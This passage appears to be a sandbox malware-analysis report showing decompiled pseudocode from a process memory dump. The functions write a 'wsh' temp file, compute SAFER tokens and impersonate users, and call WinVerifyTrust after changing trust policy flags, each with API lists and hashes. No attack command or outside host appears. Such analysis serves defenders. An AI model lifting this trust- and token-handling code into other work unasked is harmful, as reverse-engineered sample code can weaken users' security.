													if(_v16 != 0) {
														_push(_v16);
														L00B82082();
													}
													if(_v8 != 0) {
														CloseHandle(_v8);
													}
													goto L52;
												}
												_t74 = _v12;
												_t119 = _t74 + 1;
												do {
													_t104 =  *_t74;
													_t74 = _t74 + 1;
												} while (_t104 != 0);
												_t75 = _t74 - _t119;
												_a8 = _t75;
												_t76 = MultiByteToWideChar(0, 0, _v12, _t75, 0, 0);
												_t113 = _t76;
												if(_t113 == 0) {
													goto L17;
												}
												__imp__#4(0, _t113);
												_a4 = _t76;
												if(_t76 != 0) {
													if(MultiByteToWideChar(0, 0, _v12, _a8, _t76, _t113) != 0) {
														 *_a20 = _a4;
														goto L43;
													}
													_t79 = GetLastError();
													if(_t79 > 0) {
														_t79 = _t79 & 0x0000ffff | 0x80070000;
													}
													_t116 = _t79;
													goto L44;
												}
												_t116 = 0x8007000e;
												goto L44;
											}
											if( *_a8 == _v20 || WriteFile(_v8,  &_v20, 2,  &_v28, 0) != 0) {
												if(WriteFile(_v8, _a8, _t112 + _t112,  &_v28, 0) == 0 || FlushFileBuffers(_v8) == 0) {
													goto L17;
												} else {
													goto L32;
												}
											} else {
												goto L17;
											}
										}
									}
									_t106 = _v12;
									_t90 = _t106;
									_v24 = _t90 + 1;
									do {
										_t108 =  *_t90;
										_t90 = _t90 + 1;
									} while (_t108 != 0);
									if(WideCharToMultiByte(0, 0, _a4, 0xffffffff, _t90 - _v24 + _t106, _t118 - _t90 - _v24, 0, 0) == 0) {
										goto L17;
									}
									goto L24;
								}
								L17:
								_t70 = GetLastError();
								if(_t70 > 0) {
									_t70 = _t70 & 0x0000ffff | 0x80070000;
								}
								_t116 = _t70;
								goto L46;
							}
							_t116 = 0x8007000e;
							goto L46;
						}
						_t94 = GetLastError();
						if(_t94 > 0) {
							_t94 = _t94 & 0x0000ffff | 0x80070000;
						}
						_t116 = _t94;
						goto L48;
					}
					_t116 = 0x8007000e;
					goto L48;
				}
				_t96 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, 0);
				_v12 = _t96;
				if(_t96 != 0) {
					goto L7;
				}
				goto L4;
			}































                                                        0x00b90e25
                                                        0x00b90e27
                                                        0x00b90e2c
                                                        0x00b90e2f
                                                        0x00b90e32
                                                        0x00b90e3b
                                                        0x00b90e3d
                                                        0x00b90e3d
                                                        0x00b90e48
                                                        0x00b90e7b
                                                        0x00b90e83
                                                        0x00b90e87
                                                        0x00b90e5e
                                                        0x00b90e5e
                                                        0x00b90e66
                                                        0x00b90e74
                                                        0x00b90e74
                                                        0x00b90e68
                                                        0x00b9108d
                                                        0x00b91093
                                                        0x00b91093
                                                        0x00b90e89
                                                        0x00b90e8a
                                                        0x00b90e8b
                                                        0x00b90e8e
                                                        0x00b90e94
                                                        0x00b90e99
                                                        0x00b90ea9
                                                        0x00b90ead
                                                        0x00b90ecf
                                                        0x00b90ecf
                                                        0x00b90ed3
                                                        0x00b90ed4
                                                        0x00b90eda
                                                        0x00b90edf
                                                        0x00b90efd
                                                        0x00b90f1f
                                                        0x00b90f4b
                                                        0x00b90f5d
                                                        0x00b90f63
                                                        0x00b90f69
                                                        0x00b90f6b
                                                        0x00b90f6b
                                                        0x00b90f71
                                                        0x00000000
                                                        0x00b90f73
                                                        0x00b90f73
                                                        0x00b90f78
                                                        0x00b90fce
                                                        0x00b90fd1
                                                        0x00b91045
                                                        0x00b9104b
                                                        0x00b9104e
                                                        0x00b91050
                                                        0x00b91053
                                                        0x00b91055
                                                        0x00b91058
                                                        0x00b9105d
                                                        0x00b9105d
                                                        0x00b91063
                                                        0x00b91066
                                                        0x00b91068
                                                        0x00b9106b
                                                        0x00b91070
                                                        0x00b91071
                                                        0x00b91074
                                                        0x00b91076
                                                        0x00b91079
                                                        0x00b9107e
                                                        0x00b91082
                                                        0x00b91087
                                                        0x00b91087
                                                        0x00000000
                                                        0x00b91082
                                                        0x00b90fd3
                                                        0x00b90fd6
                                                        0x00b90fd9
                                                        0x00b90fd9
                                                        0x00b90fdb
                                                        0x00b90fdc
                                                        0x00b90fe2
                                                        0x00b90fee
                                                        0x00b90ff3
                                                        0x00b90ff5
                                                        0x00b90ff9
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91001
                                                        0x00b91007
                                                        0x00b9100c
                                                        0x00b91023
                                                        0x00b91043
                                                        0x00000000
                                                        0x00b91043
                                                        0x00b91025
                                                        0x00b9102d
                                                        0x00b91034
                                                        0x00b91034
                                                        0x00b91039
                                                        0x00000000
                                                        0x00b91039
                                                        0x00b9100e
                                                        0x00000000
                                                        0x00b9100e
                                                        0x00b90f8a
                                                        0x00b90fb7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b90f8a
                                                        0x00b90f71
                                                        0x00b90f21
                                                        0x00b90f24
                                                        0x00b90f29
                                                        0x00b90f2c
                                                        0x00b90f2c
                                                        0x00b90f2e
                                                        0x00b90f2f
                                                        0x00b90f49
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b90f49
                                                        0x00b90eff
                                                        0x00b90eff
                                                        0x00b90f07
                                                        0x00b90f15
                                                        0x00b90f15
                                                        0x00b90f09
                                                        0x00000000
                                                        0x00b90f09
                                                        0x00b90ee1
                                                        0x00000000
                                                        0x00b90ee1
                                                        0x00b90eaf
                                                        0x00b90eb7
                                                        0x00b90ec5
                                                        0x00b90ec5
                                                        0x00b90eb9
                                                        0x00000000
                                                        0x00b90eb9
                                                        0x00b90e9b
                                                        0x00000000
                                                        0x00b90e9b
                                                        0x00b90e55
                                                        0x00b90e57
                                                        0x00b90e5c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,74EC1222,00000000,00000000,0000008C), ref: 00B90E55
                                                        • GetLastError.KERNEL32 ref: 00B90E5E
                                                        • GetTempPathA.KERNEL32(00000000,00000000), ref: 00B90E83
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B90E8E
                                                        • GetTempPathA.KERNEL32(00000000,00000000), ref: 00B90EA9
                                                        • GetLastError.KERNEL32 ref: 00B90EAF
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B90ED4
                                                        • GetTempFileNameA.KERNEL32(00000000,wsh,00000000,00000000), ref: 00B90EF5
                                                        • GetLastError.KERNEL32 ref: 00B90EFF
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000000F,00000000,00000000), ref: 00B90F45
                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,04002100,00000000), ref: 00B90F5D
                                                        • WriteFile.KERNEL32(00000000,0000FEFF,00000002,?,00000000), ref: 00B90F9A
                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00B90FB3
                                                        • FlushFileBuffers.KERNEL32(00000000), ref: 00B90FC0
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00B90FF3
                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00B91001
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00B9101F
                                                        • GetLastError.KERNEL32 ref: 00B91025
                                                        • SysFreeString.OLEAUT32(?), ref: 00B9105D
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B9106B
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00B91079
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B91087
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: File$ByteCharErrorLastMultiWide$Temp$??2@??3@PathStringWrite$AllocBuffersCloseCreateFlushFreeHandleName
                                                        • String ID: wsh
                                                        • API String ID: 2168408934-3917767832
                                                        • Opcode ID: 91be9554f405e9c033288097ec880d428276379a4bdd9ffc410c5a81466ab5f0
                                                        • Instruction ID: 05c791a5780b84950f4b62b2e89b061febde44d23b1b26d3e31baf4d2a6b1b8c
                                                        • Opcode Fuzzy Hash: 91be9554f405e9c033288097ec880d428276379a4bdd9ffc410c5a81466ab5f0
                                                        • Instruction Fuzzy Hash: 79813C7291015AEFDF20AFA8CCC49AE7BF9EF04354B2449B9F501E7160D6358E85DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B84BA1, Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 190libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 47%
                                                        			E00B84BA1(void* __ecx, void* __edi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				void _v100;
				int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void _v120;
				signed int _v124;
				int _v128;
				int _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				int _v148;
				char _v152;
				_Unknown_base(*)()* _v156;
				_Unknown_base(*)()* _v160;
				void* __ebx;
				void* __esi;
				signed int _t76;
				signed int _t81;
				_Unknown_base(*)()* _t88;
				_Unknown_base(*)()* _t89;
				_Unknown_base(*)()* _t90;
				signed int _t94;
				signed int _t105;
				signed int _t109;
				_Unknown_base(*)()* _t110;
				void* _t122;
				void* _t125;
				signed int _t126;

				_t123 = __edi;
				_t76 =  *0xb97004; // 0xbb40e64e
				_v8 = _t76 ^ _t126;
				_t125 = __ecx;
				_v124 = _a4;
				_v128 = 0;
				_v132 = 0;
				_v136 = 0;
				_v152 = 0;
				_v140 = 0;
				_v144 =  *((intOrPtr*)(__ecx + 0x238));
				_v148 = 0;
				if( *((intOrPtr*)(__ecx + 0x26)) == 0) {
					_t81 = 1;
					L21:
					return E00B81335(_t81, 0, _v8 ^ _t126, _t122, _t123, _t125);
				}
				if(E00B855CA(__ecx, "advapi32.dll",  &_v128) < 0) {
					_v124 = 1;
					L14:
					if(_v132 != 0) {
						CloseHandle(_v132);
					}
					if(_v136 != 0 && _v148 != 0) {
						_v148(_v136);
					}
					if(_v128 != 0) {
						FreeLibrary(_v128);
					}
					_t81 = _v124;
					goto L21;
				}
				_push(__edi);
				_t88 = GetProcAddress(_v128, "SaferIdentifyLevel");
				_v156 = _t88;
				if(_t88 == 0) {
					L26:
					_v124 = 1;
					L13:
					_pop(_t123);
					goto L14;
				}
				_t89 = GetProcAddress(_v128, "SaferComputeTokenFromLevel");
				_v160 = _t89;
				if(_t89 == 0) {
					goto L26;
				}
				_t90 = GetProcAddress(_v128, "SaferCloseLevel");
				_v148 = _t90;
				if(_t90 == 0) {
					goto L26;
				}
				if( *((intOrPtr*)(_t125 + 0x27)) != 0) {
					_t92 =  &_v152;
					__imp__#7( &_v140);
					_t94 = E00B90E17(wcsrchr( *(_t125 + 0x238), 0x2e), _v124,  &_v152, _v124, _t92);
					_v124 = _t94;
					if(_t94 < 0) {
						L12:
						if(_v140 != 0) {
							__imp__#6(_v140);
						}
						goto L13;
					}
					_v144 = _v140;
				}
				memset( &_v120, 0, 0x70);
				_v112 = _v144;
				_v108 = _v152;
				_v120 = 0x70;
				_v116 = 0xd;
				_v104 = 0;
				memset( &_v100, 0, 0x40);
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *((intOrPtr*)(_t125 + 0x28)) == 1) {
					_v12 = 1;
					if( *((intOrPtr*)(_t125 + 0x20)) == 0) {
						L8:
						_push(L"SCRIPT");
						_push( &_v136);
						_push( &_v120);
						_push(1);
						if(_v156() == 0) {
							L29:
							_t105 = GetLastError();
							if(_t105 > 0) {
								_t105 = _t105 & 0x0000ffff | 0x80070000;
							}
							_v124 = _t105;
							goto L12;
						}
						_push(0);
						_push(1);
						_push( &_v132);
						_push(0);
						_push(_v136);
						if(_v160() == 0) {
							_t109 = GetLastError();
							if(_t109 > 0) {
								_t109 = _t109 & 0x0000ffff | 0x80070000;
							}
							_v124 = _t109;
							_t110 = GetProcAddress(_v128, "SaferRecordEventLogEntry");
							if(_t110 != 0) {
								 *_t110(_v136, _v144, 0);
							}
							goto L12;
						}
						if(_v132 != 0) {
							if(ImpersonateLoggedOnUser(_v132) != 0) {
								goto L11;
							}
							goto L29;
						}
						L11:
						_v124 = 0;
						goto L12;
					} else {
						goto L7;
					}
				}
				L7:
				_v12 = 2;
				goto L8;
			}









































                                                        0x00b84ba1
                                                        0x00b84bac
                                                        0x00b84bb3
                                                        0x00b84bbd
                                                        0x00b84bbf
                                                        0x00b84bc8
                                                        0x00b84bcb
                                                        0x00b84bce
                                                        0x00b84bd4
                                                        0x00b84bda
                                                        0x00b84be0
                                                        0x00b84be6
                                                        0x00b84bef
                                                        0x00b88d8d
                                                        0x00b84d50
                                                        0x00b84d5d
                                                        0x00b84d5d
                                                        0x00b84c05
                                                        0x00b88d93
                                                        0x00b84d1a
                                                        0x00b84d1d
                                                        0x00b88e77
                                                        0x00b88e77
                                                        0x00b84d29
                                                        0x00b84d39
                                                        0x00b84d39
                                                        0x00b84d42
                                                        0x00b84d47
                                                        0x00b84d47
                                                        0x00b84d4d
                                                        0x00000000
                                                        0x00b84d4d
                                                        0x00b84c0b
                                                        0x00b84c1a
                                                        0x00b84c1c
                                                        0x00b84c24
                                                        0x00b88d9f
                                                        0x00b88d9f
                                                        0x00b84d19
                                                        0x00b84d19
                                                        0x00000000
                                                        0x00b84d19
                                                        0x00b84c32
                                                        0x00b84c34
                                                        0x00b84c3c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b84c4a
                                                        0x00b84c4c
                                                        0x00b84c54
                                                        0x00000000
                                                        0x00000000
                                                        0x00b84c5d
                                                        0x00b88db2
                                                        0x00b88dbc
                                                        0x00b88dd6
                                                        0x00b88ddd
                                                        0x00b88de0
                                                        0x00b84d0d
                                                        0x00b84d13
                                                        0x00b88e69
                                                        0x00b88e69
                                                        0x00000000
                                                        0x00b84d13
                                                        0x00b88dec
                                                        0x00b88dec
                                                        0x00b84c6a
                                                        0x00b84c75
                                                        0x00b84c80
                                                        0x00b84c88
                                                        0x00b84c8f
                                                        0x00b84c96
                                                        0x00b84c99
                                                        0x00b84ca4
                                                        0x00b84ca7
                                                        0x00b84caa
                                                        0x00b84cad
                                                        0x00b84cb0
                                                        0x00b84cb3
                                                        0x00b84cb9
                                                        0x00b84d60
                                                        0x00b84d66
                                                        0x00b84cc6
                                                        0x00b84cc6
                                                        0x00b84cd1
                                                        0x00b84cd5
                                                        0x00b84cd6
                                                        0x00b84cdf
                                                        0x00b88df7
                                                        0x00b88df7
                                                        0x00b88dff
                                                        0x00b88e06
                                                        0x00b88e06
                                                        0x00b88e0b
                                                        0x00000000
                                                        0x00b88e0b
                                                        0x00b84ce5
                                                        0x00b84ce6
                                                        0x00b84ceb
                                                        0x00b84cec
                                                        0x00b84ced
                                                        0x00b84cfb
                                                        0x00b88e13
                                                        0x00b88e1b
                                                        0x00b88e22
                                                        0x00b88e22
                                                        0x00b88e2f
                                                        0x00b88e32
                                                        0x00b88e36
                                                        0x00b88e49
                                                        0x00b88e49
                                                        0x00000000
                                                        0x00b88e36
                                                        0x00b84d04
                                                        0x00b88e5b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88e61
                                                        0x00b84d0a
                                                        0x00b84d0a
                                                        0x00000000
                                                        0x00b84d6c
                                                        0x00000000
                                                        0x00b84d6c
                                                        0x00b84d66
                                                        0x00b84cbf
                                                        0x00b84cbf
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00B855CA: GetSystemDirectoryA.KERNEL32(?,00000000), ref: 00B855DD
                                                          • Part of subcall function 00B855CA: ??2@YAPAXI@Z.MSVCRT ref: 00B85603
                                                          • Part of subcall function 00B855CA: GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 00B85616
                                                          • Part of subcall function 00B855CA: LoadLibraryA.KERNEL32(00000000), ref: 00B85645
                                                          • Part of subcall function 00B855CA: ??3@YAXPAX@Z.MSVCRT ref: 00B8565F
                                                        • GetProcAddress.KERNEL32(?,SaferIdentifyLevel,00000000,advapi32.dll,?,?,?), ref: 00B84C1A
                                                        • GetProcAddress.KERNEL32(?,SaferComputeTokenFromLevel,?,?), ref: 00B84C32
                                                        • GetProcAddress.KERNEL32(?,SaferCloseLevel,?,?), ref: 00B84C4A
                                                        • memset.MSVCRT ref: 00B84C6A
                                                        • memset.MSVCRT ref: 00B84C99
                                                        • FreeLibrary.KERNEL32(?,?,00000000,?,?), ref: 00B84D47
                                                        • SysStringLen.OLEAUT32(?), ref: 00B88DBC
                                                        • wcsrchr.MSVCRT ref: 00B88DCE
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00B88DF7
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00B88E13
                                                        • GetProcAddress.KERNEL32(?,SaferRecordEventLogEntry,?,?,?,?,?,?), ref: 00B88E32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressProc$DirectoryErrorLastLibrarySystemmemset$??2@??3@FreeLoadStringwcsrchr
                                                        • String ID: SCRIPT$SaferCloseLevel$SaferComputeTokenFromLevel$SaferIdentifyLevel$SaferRecordEventLogEntry$advapi32.dll$p
                                                        • API String ID: 4129526195-712661522
                                                        • Opcode ID: fa88169bfc34276d25939409aa699c44e6eb93e899385bab0b2bb11d0edb0a78
                                                        • Instruction ID: e8cb2bd1c1a0a97915cd566acdb7d71b94811ae0d7d2e34c8dd912571eea0ad8
                                                        • Opcode Fuzzy Hash: fa88169bfc34276d25939409aa699c44e6eb93e899385bab0b2bb11d0edb0a78
                                                        • Instruction Fuzzy Hash: 3F71D471D0021A9FDB20AFA4CC85AADBAF8FB08304F6045BEE159E7261DB719D84DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8F3F0, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 111memorywindowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E00B8F3F0(long _a4, long* _a8) {
				int _v8;
				char _v12;
				short _v16;
				signed int _t27;
				short* _t33;
				long _t34;
				char _t35;
				short _t38;
				int _t41;
				intOrPtr _t47;

				_push(0);
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_push(0);
				_t47 =  *0xb97001; // 0x0
				if(_t47 == 0) {
					if(FormatMessageA(0x11ff, 0, _a4, 0,  &_v12, ??, ??) != 0) {
						L16:
						_t41 = MultiByteToWideChar(0, 0, _v12, 0xffffffff, 0, 0);
						if(_t41 == 0) {
							goto L3;
						} else {
							_t33 = LocalAlloc(0, _t41 + _t41);
							_v16 = _t33;
							if(_t33 == 0) {
								goto L3;
							} else {
								_t34 = MultiByteToWideChar(0, 0, _v12, 0xffffffff, _t33, _t41);
								if(_t34 != 0) {
									goto L7;
								} else {
									goto L3;
								}
							}
						}
					} else {
						_t35 = LocalAlloc(0, 0xb);
						_v12 = _t35;
						if(_t35 == 0) {
							goto L3;
						} else {
							E00B8CE81(_t35, 0xb, "0x%8X", _a4);
							goto L16;
						}
					}
				} else {
					_t34 = FormatMessageW(0x11ff, 0, _a4, 0,  &_v16, ??, ??);
					if(_t34 != 0) {
						L7:
						__imp__#2(_v16);
						 *_a8 = _t34;
					} else {
						_t38 = LocalAlloc(0, 0x16);
						_v16 = _t38;
						if(_t38 != 0) {
							_t34 = E00B8CF0F(_t38, 0xb, L"0x%8X", _a4);
							goto L7;
						} else {
							L3:
							_t27 = GetLastError();
							if(_t27 > 0) {
								_t27 = _t27 & 0x0000ffff | 0x80070000;
							}
							_v8 = _t27;
						}
					}
				}
				if(_v12 != 0) {
					LocalFree(_v12);
				}
				if(_v16 != 0) {
					LocalFree(_v16);
				}
				return _v8;
			}













                                                        0x00b8f3fd
                                                        0x00b8f3fe
                                                        0x00b8f401
                                                        0x00b8f404
                                                        0x00b8f407
                                                        0x00b8f408
                                                        0x00b8f40e
                                                        0x00b8f4b0
                                                        0x00b8f4d9
                                                        0x00b8f4ea
                                                        0x00b8f4ee
                                                        0x00000000
                                                        0x00b8f4f4
                                                        0x00b8f4f9
                                                        0x00b8f4ff
                                                        0x00b8f504
                                                        0x00000000
                                                        0x00b8f50a
                                                        0x00b8f513
                                                        0x00b8f517
                                                        0x00000000
                                                        0x00b8f51d
                                                        0x00000000
                                                        0x00b8f51d
                                                        0x00b8f517
                                                        0x00b8f504
                                                        0x00b8f4b2
                                                        0x00b8f4b5
                                                        0x00b8f4bb
                                                        0x00b8f4c0
                                                        0x00000000
                                                        0x00b8f4c6
                                                        0x00b8f4d1
                                                        0x00000000
                                                        0x00b8f4d6
                                                        0x00b8f4c0
                                                        0x00b8f414
                                                        0x00b8f422
                                                        0x00b8f42a
                                                        0x00b8f468
                                                        0x00b8f46b
                                                        0x00b8f474
                                                        0x00b8f42c
                                                        0x00b8f42f
                                                        0x00b8f435
                                                        0x00b8f43a
                                                        0x00b8f460
                                                        0x00000000
                                                        0x00b8f43c
                                                        0x00b8f43c
                                                        0x00b8f43c
                                                        0x00b8f444
                                                        0x00b8f44b
                                                        0x00b8f44b
                                                        0x00b8f450
                                                        0x00b8f450
                                                        0x00b8f43a
                                                        0x00b8f42a
                                                        0x00b8f47f
                                                        0x00b8f484
                                                        0x00b8f484
                                                        0x00b8f489
                                                        0x00b8f48e
                                                        0x00b8f48e
                                                        0x00b8f497

                                                        APIs
                                                        • FormatMessageW.KERNEL32(000011FF,00000000,?,00000000,80070002,00000000,00000000,00B86E16,?,00000000,80070002), ref: 00B8F422
                                                        • LocalAlloc.KERNEL32(00000000,00000016), ref: 00B8F42F
                                                        • GetLastError.KERNEL32 ref: 00B8F43C
                                                        • ___swprintf_l.LIBCMT ref: 00B8F460
                                                        • SysAllocString.OLEAUT32(?), ref: 00B8F46B
                                                        • LocalFree.KERNEL32(?), ref: 00B8F484
                                                        • LocalFree.KERNEL32(?), ref: 00B8F48E
                                                        • FormatMessageA.KERNEL32(000011FF,00000000,?,00000000,?,00000000,00000000,00B86E16,?,00000000,80070002), ref: 00B8F4A8
                                                        • LocalAlloc.KERNEL32(00000000,0000000B), ref: 00B8F4B5
                                                        • ___swprintf_l.LIBCMT ref: 00B8F4D1
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8F4E8
                                                        • LocalAlloc.KERNEL32(00000000,00000000), ref: 00B8F4F9
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8F513
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Local$Alloc$ByteCharFormatFreeMessageMultiWide___swprintf_l$ErrorLastString
                                                        • String ID: 0x%8X$0x%8X
                                                        • API String ID: 3767862258-4147741067
                                                        • Opcode ID: 9b04af228932cefd7928d94535bc651d159ef243d2fb8b653cc13457af97c496
                                                        • Instruction ID: 99f2b0233b5215a8b4af6cbb467aa2c343cdf6ecebd84bc88d7061d84d410480
                                                        • Opcode Fuzzy Hash: 9b04af228932cefd7928d94535bc651d159ef243d2fb8b653cc13457af97c496
                                                        • Instruction Fuzzy Hash: 91311CB690024ABFDB10AFA48C84DBF7BFDEB08354B1485B6F615E2261D6358941DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B91244, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 170libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 57%
                                                        			E00B91244(wchar_t* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				short _v18;
				short _v20;
				char _v24;
				int _v28;
				int _v32;
				signed int _v36;
				signed int _v40;
				int _v44;
				int _v48;
				wchar_t* _v52;
				signed int _v56;
				_Unknown_base(*)()* _v60;
				intOrPtr _v64;
				void* _v68;
				intOrPtr _v72;
				char _v76;
				int _v84;
				int _v88;
				int _v92;
				int _v96;
				char* _v100;
				intOrPtr _v104;
				int _v108;
				intOrPtr _v112;
				void _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t70;
				signed int _t76;
				signed int _t77;
				_Unknown_base(*)()* _t83;
				signed int _t84;
				signed int _t85;
				signed int _t87;
				signed int _t103;
				signed int _t108;
				signed int _t109;
				void* _t116;
				wchar_t* _t117;
				int _t120;
				signed int _t121;

				_t70 =  *0xb97004; // 0xbb40e64e
				_v8 = _t70 ^ _t121;
				_v48 = _a4;
				_v20 = 0xcd44;
				_v18 = 0x11d0;
				_t117 = __ecx;
				_v52 = __ecx;
				_v24 = 0xaac56b;
				_v16 = 0x8c;
				_v15 = 0xc2;
				_v14 = 0;
				_v13 = 0xc0;
				_v12 = 0x4f;
				_v11 = 0xc2;
				_v10 = 0x95;
				_v9 = 0xee;
				_v32 = 0;
				_v28 = 0;
				_v36 = 0;
				_v44 = 0;
				_t76 = E00B855CA(__ecx, "wintrust.dll",  &_v28);
				_t118 = _t76;
				if(_t76 < 0) {
					L18:
					_t77 = _v36;
					if(_t77 != _v44) {
						_v40(_t77);
					}
					if(_v32 != 0) {
						CloseHandle(_v32);
					}
					if(_v28 != 0) {
						FreeLibrary(_v28);
					}
					return E00B81335(_t118, 0, _v8 ^ _t121, _t116, _t117, _t118);
				}
				_t83 = GetProcAddress(_v28, "WinVerifyTrust");
				_v60 = _t83;
				if(_t83 != 0) {
					_t84 = GetProcAddress(_v28, "WintrustGetRegPolicyFlags");
					_v56 = _t84;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L2;
					}
					_t87 = GetProcAddress(_v28, "WintrustSetRegPolicyFlags");
					_v40 = _t87;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L2;
					}
					_t118 = E00B90E17(wcsrchr(_t117, 0x2e), _v48, _a8,  &_v32, 0);
					__eflags = _t118;
					if(_t118 < 0) {
						goto L18;
					}
					_t120 = 0x30;
					memset( &_v124, 0, _t120);
					__eflags = _a16;
					_t117 =  &_v76;
					_v124 = _t120;
					_v108 = 0;
					_v96 = 0;
					_v92 = 0;
					_v88 = 0;
					_v84 = 0;
					_v112 = (0 | _a16 == 0x00000000) + 1;
					_v100 =  &_v76;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v72 = _v52;
					_v64 = _a12;
					_v104 = 1;
					_v76 = 0x10;
					_v68 = _v32;
					__eflags = _a16;
					if(_a16 != 0) {
						L12:
						_t103 = _v60(0,  &_v24,  &_v124);
						__eflags = _t103;
						if(__eflags == 0) {
							L17:
							_t118 = 0;
							__eflags = 0;
							goto L18;
						}
						if(__eflags > 0) {
							__eflags = _t103;
							if(_t103 > 0) {
								_t103 = _t103 & 0x0000ffff | 0x80070000;
								__eflags = _t103;
							}
						}
						_t118 = _t103;
						__eflags = _t118;
						if(_t118 < 0) {
							goto L18;
						} else {
							goto L17;
						}
					}
					_v56( &_v36);
					_t108 = _v36 | 0x00040000;
					_v44 = _t108;
					__eflags = _t108 - _v36;
					if(_t108 == _v36) {
						goto L12;
					}
					_t109 = _v40(_t108);
					__eflags = _t109;
					if(_t109 != 0) {
						goto L12;
					}
					_t118 = 0x80004005;
					goto L18;
				}
				L2:
				_t85 = GetLastError();
				if(_t85 > 0) {
					_t85 = _t85 & 0x0000ffff | 0x80070000;
				}
				_t118 = _t85;
				goto L18;
			}






















































                                                        0x00b9124c
                                                        0x00b91253
                                                        0x00b91259
                                                        0x00b91262
                                                        0x00b9126d
                                                        0x00b91277
                                                        0x00b9127e
                                                        0x00b91281
                                                        0x00b91288
                                                        0x00b9128c
                                                        0x00b91290
                                                        0x00b91293
                                                        0x00b91297
                                                        0x00b9129b
                                                        0x00b9129f
                                                        0x00b912a3
                                                        0x00b912a7
                                                        0x00b912aa
                                                        0x00b912ad
                                                        0x00b912b0
                                                        0x00b912b3
                                                        0x00b912b8
                                                        0x00b912bc
                                                        0x00b913ec
                                                        0x00b913ec
                                                        0x00b913f2
                                                        0x00b913f5
                                                        0x00b913f5
                                                        0x00b913fb
                                                        0x00b91400
                                                        0x00b91400
                                                        0x00b91409
                                                        0x00b9140e
                                                        0x00b9140e
                                                        0x00b91424
                                                        0x00b91424
                                                        0x00b912d0
                                                        0x00b912d2
                                                        0x00b912d7
                                                        0x00b912fc
                                                        0x00b912fe
                                                        0x00b91301
                                                        0x00b91303
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9130d
                                                        0x00b9130f
                                                        0x00b91312
                                                        0x00b91314
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91331
                                                        0x00b91333
                                                        0x00b91335
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9133d
                                                        0x00b91344
                                                        0x00b9134e
                                                        0x00b91351
                                                        0x00b91357
                                                        0x00b9135a
                                                        0x00b9135d
                                                        0x00b91360
                                                        0x00b91363
                                                        0x00b91366
                                                        0x00b9136a
                                                        0x00b91370
                                                        0x00b91375
                                                        0x00b91376
                                                        0x00b91377
                                                        0x00b91378
                                                        0x00b9137c
                                                        0x00b91382
                                                        0x00b91388
                                                        0x00b9138f
                                                        0x00b91396
                                                        0x00b91399
                                                        0x00b9139c
                                                        0x00b913c4
                                                        0x00b913cd
                                                        0x00b913d0
